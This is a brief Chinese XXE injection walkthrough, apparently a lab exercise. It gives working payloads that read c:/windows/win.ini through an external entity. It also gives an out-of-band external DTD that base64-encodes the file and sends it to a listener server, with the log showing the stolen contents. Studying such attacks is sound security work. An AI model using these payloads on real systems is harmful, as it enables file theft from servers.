先随便输入一个内容查看

服务器有回显

接下来用bp抓包看下参数

有个xml参数，而且Content-Type: application/x-www-form-urlencoded，我们传入url编码后的xml内容试一下

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe "你好吗？" >
]>
<foo>&xxe;</foo>

url编码后放入参数xml

接下来试试能不能读取系统文件内容

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

假如服务器没有回显

我们可以打一个自己的服务器尝试请求

python -m http.server 99

每次访问都会有记录

http://localhost:99/xxe.dtd内容

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini" >
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://localhost:99?c=%file;'>">

POC：

<!DOCTYPE convert [<!ENTITY % remote SYSTEM "http://localhost:99/xxe.dtd">%remote;%int;%send;
]>

::1 - - [02/Mar/2024 23:18:52] "GET /?c=OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQo= HTTP/1.0" 200 -
参数c的值就是文件内容的base64编码